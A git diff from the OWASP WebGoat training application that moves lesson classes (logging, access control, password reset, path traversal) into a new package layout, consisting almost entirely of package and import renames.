diff --git a/webgoat-lessons/webgoat-lesson-template/src/main/java/org/owasp/webgoat/template/LessonTemplate.java b/src/main/java/org/owasp/webgoat/lessons/lesson_template/LessonTemplate.java
similarity index 89%
rename from webgoat-lessons/webgoat-lesson-template/src/main/java/org/owasp/webgoat/template/LessonTemplate.java
rename to src/main/java/org/owasp/webgoat/lessons/lesson_template/LessonTemplate.java
index 7e6f201b9..100778bea 100644
--- a/webgoat-lessons/webgoat-lesson-template/src/main/java/org/owasp/webgoat/template/LessonTemplate.java
+++ b/src/main/java/org/owasp/webgoat/lessons/lesson_template/LessonTemplate.java
@@ -20,10 +20,10 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.template;
+package org.owasp.webgoat.lessons.lesson_template;
 
-import org.owasp.webgoat.lessons.Category;
-import org.owasp.webgoat.lessons.Lesson;
+import org.owasp.webgoat.container.lessons.Category;
+import org.owasp.webgoat.container.lessons.Lesson;
 import org.springframework.stereotype.Component;
 
 @Component
diff --git a/webgoat-lessons/webgoat-lesson-template/src/main/java/org/owasp/webgoat/template/SampleAttack.java b/src/main/java/org/owasp/webgoat/lessons/lesson_template/SampleAttack.java
similarity index 92%
rename from webgoat-lessons/webgoat-lesson-template/src/main/java/org/owasp/webgoat/template/SampleAttack.java
rename to src/main/java/org/owasp/webgoat/lessons/lesson_template/SampleAttack.java
index e72ceafe1..ed92f6634 100644
--- a/webgoat-lessons/webgoat-lesson-template/src/main/java/org/owasp/webgoat/template/SampleAttack.java
+++ b/src/main/java/org/owasp/webgoat/lessons/lesson_template/SampleAttack.java
@@ -20,13 +20,13 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.template;
+package org.owasp.webgoat.lessons.lesson_template;
 
 import lombok.AllArgsConstructor;
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
-import org.owasp.webgoat.session.UserSessionData;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
+import org.owasp.webgoat.container.session.UserSessionData;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.web.bind.annotation.GetMapping;
 import org.springframework.web.bind.annotation.PathVariable;
diff --git a/webgoat-lessons/logging/src/main/java/org/owasp/webgoat/logging/LogBleedingTask.java b/src/main/java/org/owasp/webgoat/lessons/logging/LogBleedingTask.java
similarity index 93%
rename from webgoat-lessons/logging/src/main/java/org/owasp/webgoat/logging/LogBleedingTask.java
rename to src/main/java/org/owasp/webgoat/lessons/logging/LogBleedingTask.java
index 3a0949218..54b1e6925 100644
--- a/webgoat-lessons/logging/src/main/java/org/owasp/webgoat/logging/LogBleedingTask.java
+++ b/src/main/java/org/owasp/webgoat/lessons/logging/LogBleedingTask.java
@@ -20,11 +20,11 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.logging;
+package org.owasp.webgoat.lessons.logging;
 
 import org.apache.logging.log4j.util.Strings;
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
 import org.springframework.web.bind.annotation.PostMapping;
diff --git a/webgoat-lessons/logging/src/main/java/org/owasp/webgoat/logging/LogSpoofing.java b/src/main/java/org/owasp/webgoat/lessons/logging/LogSpoofing.java
similarity index 91%
rename from webgoat-lessons/logging/src/main/java/org/owasp/webgoat/logging/LogSpoofing.java
rename to src/main/java/org/owasp/webgoat/lessons/logging/LogSpoofing.java
index ccf32eae6..eed7bea87 100644
--- a/webgoat-lessons/logging/src/main/java/org/owasp/webgoat/logging/LogSpoofing.java
+++ b/src/main/java/org/owasp/webgoat/lessons/logging/LogSpoofing.java
@@ -1,7 +1,7 @@
-package org.owasp.webgoat.logging;
+package org.owasp.webgoat.lessons.logging;
 
-import org.owasp.webgoat.lessons.Category;
-import org.owasp.webgoat.lessons.Lesson;
+import org.owasp.webgoat.container.lessons.Category;
+import org.owasp.webgoat.container.lessons.Lesson;
 import org.springframework.stereotype.Component;
 
 /**
diff --git a/webgoat-lessons/logging/src/main/java/org/owasp/webgoat/logging/LogSpoofingTask.java b/src/main/java/org/owasp/webgoat/lessons/logging/LogSpoofingTask.java
similarity index 92%
rename from webgoat-lessons/logging/src/main/java/org/owasp/webgoat/logging/LogSpoofingTask.java
rename to src/main/java/org/owasp/webgoat/lessons/logging/LogSpoofingTask.java
index 193a5ab73..c521e12b5 100644
--- a/webgoat-lessons/logging/src/main/java/org/owasp/webgoat/logging/LogSpoofingTask.java
+++ b/src/main/java/org/owasp/webgoat/lessons/logging/LogSpoofingTask.java
@@ -20,11 +20,11 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.logging;
+package org.owasp.webgoat.lessons.logging;
 
 import org.apache.logging.log4j.util.Strings;
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
diff --git a/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/DisplayUser.java b/src/main/java/org/owasp/webgoat/lessons/missing_ac/DisplayUser.java
similarity index 98%
rename from webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/DisplayUser.java
rename to src/main/java/org/owasp/webgoat/lessons/missing_ac/DisplayUser.java
index bb07cf284..2bb2fe0c9 100644
--- a/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/DisplayUser.java
+++ b/src/main/java/org/owasp/webgoat/lessons/missing_ac/DisplayUser.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.missing_ac;
+package org.owasp.webgoat.lessons.missing_ac;
 
 import lombok.Getter;
 
diff --git a/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/MissingAccessControlUserRepository.java b/src/main/java/org/owasp/webgoat/lessons/missing_ac/MissingAccessControlUserRepository.java
similarity index 94%
rename from webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/MissingAccessControlUserRepository.java
rename to src/main/java/org/owasp/webgoat/lessons/missing_ac/MissingAccessControlUserRepository.java
index 51a6fe726..f42eeddc0 100644
--- a/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/MissingAccessControlUserRepository.java
+++ b/src/main/java/org/owasp/webgoat/lessons/missing_ac/MissingAccessControlUserRepository.java
@@ -1,6 +1,6 @@
-package org.owasp.webgoat.missing_ac;
+package org.owasp.webgoat.lessons.missing_ac;
 
-import org.owasp.webgoat.LessonDataSource;
+import org.owasp.webgoat.container.LessonDataSource;
 import org.springframework.jdbc.core.RowMapper;
 import org.springframework.jdbc.core.namedparam.MapSqlParameterSource;
 import org.springframework.jdbc.core.namedparam.NamedParameterJdbcTemplate;
diff --git a/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/MissingFunctionAC.java b/src/main/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionAC.java
similarity index 91%
rename from webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/MissingFunctionAC.java
rename to src/main/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionAC.java
index 8a6900c9b..2992a9a69 100644
--- a/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/MissingFunctionAC.java
+++ b/src/main/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionAC.java
@@ -20,10 +20,10 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.missing_ac;
+package org.owasp.webgoat.lessons.missing_ac;
 
-import org.owasp.webgoat.lessons.Category;
-import org.owasp.webgoat.lessons.Lesson;
+import org.owasp.webgoat.container.lessons.Category;
+import org.owasp.webgoat.container.lessons.Lesson;
 import org.springframework.stereotype.Component;
 
 @Component
diff --git a/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/MissingFunctionACHiddenMenus.java b/src/main/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionACHiddenMenus.java
similarity index 90%
rename from webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/MissingFunctionACHiddenMenus.java
rename to src/main/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionACHiddenMenus.java
index d588da180..e07dbc961 100644
--- a/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/MissingFunctionACHiddenMenus.java
+++ b/src/main/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionACHiddenMenus.java
@@ -20,11 +20,11 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.missing_ac;
+package org.owasp.webgoat.lessons.missing_ac;
 
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
diff --git a/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/MissingFunctionACUsers.java b/src/main/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionACUsers.java
similarity index 93%
rename from webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/MissingFunctionACUsers.java
rename to src/main/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionACUsers.java
index 64fb15015..c8052cada 100644
--- a/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/MissingFunctionACUsers.java
+++ b/src/main/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionACUsers.java
@@ -20,11 +20,11 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.missing_ac;
+package org.owasp.webgoat.lessons.missing_ac;
 
 import lombok.AllArgsConstructor;
 import lombok.extern.slf4j.Slf4j;
-import org.owasp.webgoat.session.WebSession;
+import org.owasp.webgoat.container.session.WebSession;
 import org.springframework.http.HttpStatus;
 import org.springframework.http.ResponseEntity;
 import org.springframework.stereotype.Controller;
@@ -38,8 +38,8 @@ import java.util.ArrayList;
 import java.util.List;
 import java.util.stream.Collectors;
 
-import static org.owasp.webgoat.missing_ac.MissingFunctionAC.PASSWORD_SALT_ADMIN;
-import static org.owasp.webgoat.missing_ac.MissingFunctionAC.PASSWORD_SALT_SIMPLE;
+import static org.owasp.webgoat.lessons.missing_ac.MissingFunctionAC.PASSWORD_SALT_ADMIN;
+import static org.owasp.webgoat.lessons.missing_ac.MissingFunctionAC.PASSWORD_SALT_SIMPLE;
 
 /**
  * Created by jason on 1/5/17.
diff --git a/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/MissingFunctionACYourHash.java b/src/main/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionACYourHash.java
similarity index 86%
rename from webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/MissingFunctionACYourHash.java
rename to src/main/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionACYourHash.java
index 41815d07f..1c5a7a279 100644
--- a/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/MissingFunctionACYourHash.java
+++ b/src/main/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionACYourHash.java
@@ -20,17 +20,17 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.missing_ac;
+package org.owasp.webgoat.lessons.missing_ac;
 
 import lombok.RequiredArgsConstructor;
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import static org.owasp.webgoat.missing_ac.MissingFunctionAC.PASSWORD_SALT_SIMPLE;
+import static org.owasp.webgoat.lessons.missing_ac.MissingFunctionAC.PASSWORD_SALT_SIMPLE;
 
 @RestController
 @AssignmentHints({"access-control.hash.hint1", "access-control.hash.hint2", "access-control.hash.hint3", "access-control.hash.hint4", "access-control.hash.hint5"})
diff --git a/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/MissingFunctionACYourHashAdmin.java b/src/main/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionACYourHashAdmin.java
similarity index 88%
rename from webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/MissingFunctionACYourHashAdmin.java
rename to src/main/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionACYourHashAdmin.java
index d0c03e070..8184a2f3e 100644
--- a/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/MissingFunctionACYourHashAdmin.java
+++ b/src/main/java/org/owasp/webgoat/lessons/missing_ac/MissingFunctionACYourHashAdmin.java
@@ -20,16 +20,16 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.missing_ac;
+package org.owasp.webgoat.lessons.missing_ac;
 
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import static org.owasp.webgoat.missing_ac.MissingFunctionAC.PASSWORD_SALT_ADMIN;
+import static org.owasp.webgoat.lessons.missing_ac.MissingFunctionAC.PASSWORD_SALT_ADMIN;
 
 @RestController
 @AssignmentHints({"access-control.hash.hint6", "access-control.hash.hint7",
diff --git a/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/User.java b/src/main/java/org/owasp/webgoat/lessons/missing_ac/User.java
similarity index 84%
rename from webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/User.java
rename to src/main/java/org/owasp/webgoat/lessons/missing_ac/User.java
index 5025a7d82..a3a9be85b 100644
--- a/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/User.java
+++ b/src/main/java/org/owasp/webgoat/lessons/missing_ac/User.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.missing_ac;
+package org.owasp.webgoat.lessons.missing_ac;
 
 import lombok.AllArgsConstructor;
 import lombok.Data;
diff --git a/webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/password_reset/PasswordReset.java b/src/main/java/org/owasp/webgoat/lessons/password_reset/PasswordReset.java
similarity index 89%
rename from webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/password_reset/PasswordReset.java
rename to src/main/java/org/owasp/webgoat/lessons/password_reset/PasswordReset.java
index 758e4630e..502140c32 100644
--- a/webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/password_reset/PasswordReset.java
+++ b/src/main/java/org/owasp/webgoat/lessons/password_reset/PasswordReset.java
@@ -20,10 +20,10 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.password_reset;
+package org.owasp.webgoat.lessons.password_reset;
 
-import org.owasp.webgoat.lessons.Category;
-import org.owasp.webgoat.lessons.Lesson;
+import org.owasp.webgoat.container.lessons.Category;
+import org.owasp.webgoat.container.lessons.Lesson;
 import org.springframework.stereotype.Component;
 
 @Component
diff --git a/webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/password_reset/PasswordResetEmail.java b/src/main/java/org/owasp/webgoat/lessons/password_reset/PasswordResetEmail.java
similarity index 96%
rename from webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/password_reset/PasswordResetEmail.java
rename to src/main/java/org/owasp/webgoat/lessons/password_reset/PasswordResetEmail.java
index 45271fe34..848e70683 100644
--- a/webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/password_reset/PasswordResetEmail.java
+++ b/src/main/java/org/owasp/webgoat/lessons/password_reset/PasswordResetEmail.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.password_reset;
+package org.owasp.webgoat.lessons.password_reset;
 
 import lombok.Builder;
 import lombok.Data;
@@ -37,4 +37,4 @@ public class PasswordResetEmail implements Serializable {
     private String sender;
     private String title;
     private String recipient;
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/password_reset/QuestionsAssignment.java b/src/main/java/org/owasp/webgoat/lessons/password_reset/QuestionsAssignment.java
similarity index 93%
rename from webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/password_reset/QuestionsAssignment.java
rename to src/main/java/org/owasp/webgoat/lessons/password_reset/QuestionsAssignment.java
index 72cd82cc5..1b698067e 100644
--- a/webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/password_reset/QuestionsAssignment.java
+++ b/src/main/java/org/owasp/webgoat/lessons/password_reset/QuestionsAssignment.java
@@ -20,10 +20,10 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.password_reset;
+package org.owasp.webgoat.lessons.password_reset;
 
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.http.MediaType;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
diff --git a/webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/password_reset/ResetLinkAssignment.java b/src/main/java/org/owasp/webgoat/lessons/password_reset/ResetLinkAssignment.java
similarity index 92%
rename from webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/password_reset/ResetLinkAssignment.java
rename to src/main/java/org/owasp/webgoat/lessons/password_reset/ResetLinkAssignment.java
index 7283f68aa..24078d78d 100644
--- a/webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/password_reset/ResetLinkAssignment.java
+++ b/src/main/java/org/owasp/webgoat/lessons/password_reset/ResetLinkAssignment.java
@@ -20,13 +20,13 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.password_reset;
+package org.owasp.webgoat.lessons.password_reset;
 
-import com.beust.jcommander.internal.Maps;
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
-import org.owasp.webgoat.password_reset.resetlink.PasswordChangeForm;
+import com.google.common.collect.Maps;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
+import org.owasp.webgoat.lessons.password_reset.resetlink.PasswordChangeForm;
 import org.springframework.ui.Model;
 import org.springframework.validation.BindingResult;
 import org.springframework.web.bind.annotation.GetMapping;
@@ -120,7 +120,7 @@ public class ResetLinkAssignment extends AssignmentEndpoint {
         if (checkIfLinkIsFromTom(form.getResetLink())) {
             usersToTomPassword.put(getWebSession().getUserName(), form.getPassword());
         }
-        modelAndView.setViewName("success");
+        modelAndView.setViewName("lessons/password_reset/templates/success.html");
         return modelAndView;
     }
 
diff --git a/webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/password_reset/ResetLinkAssignmentForgotPassword.java b/src/main/java/org/owasp/webgoat/lessons/password_reset/ResetLinkAssignmentForgotPassword.java
similarity index 96%
rename from webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/password_reset/ResetLinkAssignmentForgotPassword.java
rename to src/main/java/org/owasp/webgoat/lessons/password_reset/ResetLinkAssignmentForgotPassword.java
index 54b95b21e..111753a09 100644
--- a/webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/password_reset/ResetLinkAssignmentForgotPassword.java
+++ b/src/main/java/org/owasp/webgoat/lessons/password_reset/ResetLinkAssignmentForgotPassword.java
@@ -20,10 +20,10 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.password_reset;
+package org.owasp.webgoat.lessons.password_reset;
 
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.beans.factory.annotation.Value;
 import org.springframework.http.HttpEntity;
 import org.springframework.http.HttpHeaders;
diff --git a/webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/password_reset/SecurityQuestionAssignment.java b/src/main/java/org/owasp/webgoat/lessons/password_reset/SecurityQuestionAssignment.java
similarity index 96%
rename from webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/password_reset/SecurityQuestionAssignment.java
rename to src/main/java/org/owasp/webgoat/lessons/password_reset/SecurityQuestionAssignment.java
index 551a8f7b8..fd4b2d547 100644
--- a/webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/password_reset/SecurityQuestionAssignment.java
+++ b/src/main/java/org/owasp/webgoat/lessons/password_reset/SecurityQuestionAssignment.java
@@ -20,10 +20,10 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.password_reset;
+package org.owasp.webgoat.lessons.password_reset;
 
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
diff --git a/webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/password_reset/SimpleMailAssignment.java b/src/main/java/org/owasp/webgoat/lessons/password_reset/SimpleMailAssignment.java
similarity index 96%
rename from webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/password_reset/SimpleMailAssignment.java
rename to src/main/java/org/owasp/webgoat/lessons/password_reset/SimpleMailAssignment.java
index 048f5e78c..83e56bcba 100644
--- a/webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/password_reset/SimpleMailAssignment.java
+++ b/src/main/java/org/owasp/webgoat/lessons/password_reset/SimpleMailAssignment.java
@@ -20,11 +20,11 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.password_reset;
+package org.owasp.webgoat.lessons.password_reset;
 
 import org.apache.commons.lang3.StringUtils;
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.beans.factory.annotation.Value;
 import org.springframework.http.MediaType;
 import org.springframework.web.bind.annotation.PostMapping;
diff --git a/webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/password_reset/TriedQuestions.java b/src/main/java/org/owasp/webgoat/lessons/password_reset/TriedQuestions.java
similarity index 96%
rename from webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/password_reset/TriedQuestions.java
rename to src/main/java/org/owasp/webgoat/lessons/password_reset/TriedQuestions.java
index c873328c7..69a8914dc 100644
--- a/webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/password_reset/TriedQuestions.java
+++ b/src/main/java/org/owasp/webgoat/lessons/password_reset/TriedQuestions.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.password_reset;
+package org.owasp.webgoat.lessons.password_reset;
 
 import org.springframework.stereotype.Component;
 import org.springframework.web.context.annotation.SessionScope;
diff --git a/webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/password_reset/resetlink/PasswordChangeForm.java b/src/main/java/org/owasp/webgoat/lessons/password_reset/resetlink/PasswordChangeForm.java
similarity index 84%
rename from webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/password_reset/resetlink/PasswordChangeForm.java
rename to src/main/java/org/owasp/webgoat/lessons/password_reset/resetlink/PasswordChangeForm.java
index d9ab5f71a..6ece727e3 100644
--- a/webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/password_reset/resetlink/PasswordChangeForm.java
+++ b/src/main/java/org/owasp/webgoat/lessons/password_reset/resetlink/PasswordChangeForm.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.password_reset.resetlink;
+package org.owasp.webgoat.lessons.password_reset.resetlink;
 
 import lombok.Getter;
 import lombok.Setter;
diff --git a/webgoat-lessons/path-traversal/src/main/java/org/owasp/webgoat/path_traversal/PathTraversal.java b/src/main/java/org/owasp/webgoat/lessons/path_traversal/PathTraversal.java
similarity index 89%
rename from webgoat-lessons/path-traversal/src/main/java/org/owasp/webgoat/path_traversal/PathTraversal.java
rename to src/main/java/org/owasp/webgoat/lessons/path_traversal/PathTraversal.java
index 2a991bf2f..4cacd14cd 100644
--- a/webgoat-lessons/path-traversal/src/main/java/org/owasp/webgoat/path_traversal/PathTraversal.java
+++ b/src/main/java/org/owasp/webgoat/lessons/path_traversal/PathTraversal.java
@@ -20,10 +20,10 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.path_traversal;
+package org.owasp.webgoat.lessons.path_traversal;
 
-import org.owasp.webgoat.lessons.Category;
-import org.owasp.webgoat.lessons.Lesson;
+import org.owasp.webgoat.container.lessons.Category;
+import org.owasp.webgoat.container.lessons.Lesson;
 import org.springframework.stereotype.Component;
 
 @Component
diff --git a/webgoat-lessons/path-traversal/src/main/java/org/owasp/webgoat/path_traversal/ProfileUpload.java b/src/main/java/org/owasp/webgoat/lessons/path_traversal/ProfileUpload.java
similarity index 86%
rename from webgoat-lessons/path-traversal/src/main/java/org/owasp/webgoat/path_traversal/ProfileUpload.java
rename to src/main/java/org/owasp/webgoat/lessons/path_traversal/ProfileUpload.java
index 67eac2277..eaaff7963 100644
--- a/webgoat-lessons/path-traversal/src/main/java/org/owasp/webgoat/path_traversal/ProfileUpload.java
+++ b/src/main/java/org/owasp/webgoat/lessons/path_traversal/ProfileUpload.java
@@ -1,8 +1,8 @@
-package org.owasp.webgoat.path_traversal;
+package org.owasp.webgoat.lessons.path_traversal;
 
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
-import org.owasp.webgoat.session.WebSession;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
+import org.owasp.webgoat.container.session.WebSession;
 import org.springframework.beans.factory.annotation.Value;
 import org.springframework.http.ResponseEntity;
 import org.springframework.web.bind.annotation.GetMapping;
diff --git a/webgoat-lessons/path-traversal/src/main/java/org/owasp/webgoat/path_traversal/ProfileUploadBase.java b/src/main/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadBase.java
similarity index 93%
rename from webgoat-lessons/path-traversal/src/main/java/org/owasp/webgoat/path_traversal/ProfileUploadBase.java
rename to src/main/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadBase.java
index 08923181e..639e9eca7 100644
--- a/webgoat-lessons/path-traversal/src/main/java/org/owasp/webgoat/path_traversal/ProfileUploadBase.java
+++ b/src/main/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadBase.java
@@ -1,11 +1,11 @@
-package org.owasp.webgoat.path_traversal;
+package org.owasp.webgoat.lessons.path_traversal;
 
 import lombok.AllArgsConstructor;
 import lombok.Getter;
 import lombok.SneakyThrows;
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AttackResult;
-import org.owasp.webgoat.session.WebSession;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AttackResult;
+import org.owasp.webgoat.container.session.WebSession;
 import org.springframework.http.MediaType;
 import org.springframework.http.ResponseEntity;
 import org.springframework.util.FileCopyUtils;
@@ -16,9 +16,7 @@ import org.springframework.web.multipart.MultipartFile;
 import java.io.File;
 import java.io.FileInputStream;
 import java.io.IOException;
